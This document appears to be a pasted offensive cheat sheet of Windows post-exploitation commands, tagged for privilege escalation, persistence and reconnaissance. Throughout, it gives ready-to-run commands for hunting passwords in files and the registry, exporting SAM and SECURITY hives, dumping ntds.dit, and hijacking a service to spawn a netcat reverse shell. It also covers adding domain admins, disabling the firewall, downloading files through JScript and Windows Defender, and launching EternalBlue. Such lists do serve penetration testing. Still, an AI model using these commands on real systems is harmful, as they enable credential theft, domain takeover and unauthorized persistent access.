Sweetening

command prompt

Nov 27th, 2023
# windows

#plateform/windows #target/local #cat/PRIVESC

## get system info
```
systeminfo
```

## get system info - limited
```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

## find passwords
```
findstr /si 'password' *.txt *.xml *.docx
```

## find passwords - group policy preference (ms14-025)
```
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
```

## get patches
```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

## get hostname
```
hostname
```

## get computer name
```powershell
$env:computername
```

## show environment - List all environment variables
```
set
```

## dns request for DC
```
nslookup -type=any <userdnsdomain>.
```

## show mounted disks
```
wmic logicaldisk get caption,description,providername
```

## show recycle bin
```
dir C:\$Recycle.Bin /s /b
```

## get architecture
```
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```

## list scheduled tasks
```
schtasks /query /fo LIST /v
```

## list one scheduled task
```
schtasks /query /fo LIST 2>nul | findstr <taskname>
```

## list processes
```
tasklist /V
```

## list processes and links to started services
```
tasklist /SVC
```

## list started windows services (1)
```
net start
```

## list services (2)
```
wmic service list brief
```

## list services (3)
```
sc query
```

## list installed software (1)
```
dir /a "C:\Program Files"
```

## list installed software (2)
```
dir /a "C:\Program Files (x86)"
```

## list installed software (3)
```
reg query HKEY_LOCAL_MACHINE\SOFTWARE
```

## show lsa cached credentials value
```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
```

## registry query for the word password (1)
```
reg query HKLM /f password /t REG_SZ /s
```

## registry query for the word password (2)
```
reg query HKCU /f password /t REG_SZ /s
```

## registry query - extract SAM

While the Windows operating system is running, the registry hives are in use and mounted. The `reg` command-line tool can be used to export them.

```
reg save HKLM\SAM 'C:\Windows\Temp\sam.save'
reg save HKLM\SECURITY 'C:\Windows\Temp\security.save'
reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'
```

## create shadow copy
```
wmic shadowcopy call create Volume='C:\'
```

## list shadow copy
```
vssadmin list shadows
```

## check service privilege
```
accesschk.exe /accepteula -ucqv <service_name>
```

## reconfigure service
```
sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
```

## change service
```
sc config <service> obj= ".\LocalSystem" password= ""
```

## start service
```
net start <service>
```

## check permission (1)
```
accesschk.exe /accepteula -dqv "<file>"
```

## check permission (2)
```
cacls "<file>"
```

## find weak folder permission
```
accesschk.exe -uwdqs Users <c>:\
```

## find weak file permission
```
accesschk.exe -uwqs Users <c>:\
```

% windows, download

## JScript download file script
#cat/ATTACK/FILE_TRANSFERT
```
echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js <file_url> > <downloaded_file>
```

% windows, users

## add user
#cat/PERSIST
```
net user <username> <password> /ADD
```

## add user to domain
#cat/PERSIST
```
net user <username> <password> /ADD /DOMAIN
```

## add user as admin
#cat/PERSIST
```
net localgroup administrators <username> /add
```

## run as another user
#cat/PRIVESC
```
runas /user:<domain>\<user> cmd.exe
```

## whoami - All info about me, take a look at the enabled tokens
#cat/PRIVESC
```
whoami /all
```

## whoami privileges - show only privileges
#cat/PRIVESC
```
whoami /priv
```

## list all users
#cat/PRIVESC
```
net users
```

## list domain admins (fr)
#plateform/windows #target/local #cat/RECON
```
net group "Admins du domaine"
```

## info about a user
#cat/RECON
```
net user <username>
```

## info on the Administrator account and retrieve SID
```powershell
[wmi] "Win32_userAccount.Domain='<computer_name>',Name='Administrator'"
```

## info about password policy
#cat/RECON
```
net accounts
```

## who logged in
#cat/PRIVESC
```
qwinsta
```

## List credentials
#cat/POSTEXPLOIT/CREDS_RECOVER
```
cmdkey /list
```

## show local groups
#cat/RECON
```
net localgroup
```

## show specific local group
```
net localgroup <group_name>
```

## show domain groups
```
net group /domain
```

## show domain group users
```
net group /domain <domain_group_name>
```

% windows, domain infos

## get domain name
```
echo %USERDOMAIN%
```

## get domain name (2)
```
echo %USERDNSDOMAIN%
```

## get computer domain name (3)
```
systeminfo | findstr /B /C:"Domain"
```

## get name of the DC
```
echo %logonserver%
```

## get name of the dc (2) - name of the domain controller
```
set logonserver
```

## list of domain groups
```
net groups /domain
```

## list of computers connected to the domain
```
net group "domain computers" /domain
```

## List all PCs of the domain
```
net view /domain
```

## list domain controllers
```
nltest /dclist:<domain>
```

## list pc accounts of domain controllers
```
net group "Domain Controllers" /domain
```

## List users with domain admin privileges
```
net group "Domain Admins" /domain
```

## Add user to domain admin group
```
net group "Domain Admins" <username> /add /domain
```

## Add user to domain admin group - FR
```
net group "Admins du domaine" <username> /add /domain
```

## List users that belong to the administrators group inside the domain
```
net localgroup administrators /domain
```

## List all domain users
```
net user /domain
```

## get user domain information
```
net user <username> /domain
```

## domain password and lockout policy
```
net accounts /domain
```

## get mapping of the trust relationships
```
nltest /domain_trusts
```

% windows, network
## all interfaces
```
ipconfig /all
```

## print all routes
```
route print
```

## list of known hosts
```
arp -a
```

## list open ports
```
netstat -ano
```

## show hosts file
```
type C:\WINDOWS\System32\drivers\etc\hosts
```

% windows, dir

## list hidden files
```
dir /a:h <path>
```

## Recursive list
```
dir /s /b
```

% windows, firewall
## show firewall state
```
netsh firewall show state
```

## show firewall config
```
netsh firewall show config
```

## turn off firewall
```
NetSh Advfirewall set allprofiles state off
```

## turn off firewall (2)
```
netsh firewall set opmode disable
```

## turn on firewall
```
NetSh Advfirewall set allprofiles state on
```

## firewall open port RDP
```
netsh firewall add portopening TCP 3389 "Remote Desktop"
```

% windows, ntds.dit
## dump ntds.dit (Windows >= 2008 server) - method 1
```
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
## dump ntds.dit (Windows >= 2008 server) - method 2
```
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
```
## dump ntds.dit (Windows <= 2003 server)
```
net start vss && vssadmin create shadow /for=c: && vssadmin list shadows && copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
```

% windows, smb, share
## list of computers
```
net view
```

## list of computer shares on the domain
```
net view /all /domain:<domain_name>
```

## list shares of a computer
```
net view \\<ip> /all
```

## mount share locally
```
net use x: \\<ip>\<share_name>
```

## check current share
```
net share
```

% windows, file, download
## windows download file with windows defender
```
"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url <url> -path <result_file>
```

## windows download file with windows defender
```
mpcmdrun.exe -DownloadFile -url <url> -path <result_file>
```

% windows, active directory, dns

## find AD IP - show domain name and dns
```
nmcli dev show <interface>
```

## nslookup AD - domain
```
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain_name>
```

% windows, active directory

## enable sid history
Enable SID history on the source domain for the target domain (useful for forest extra SID exploitation)
```
netdom trust <source_domain> /d:<target_domain> /enablesidhistory:yes
```

% windows, cve
## windows eternal blue - smb - ms17-010
```
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue"
```

= interface: eth0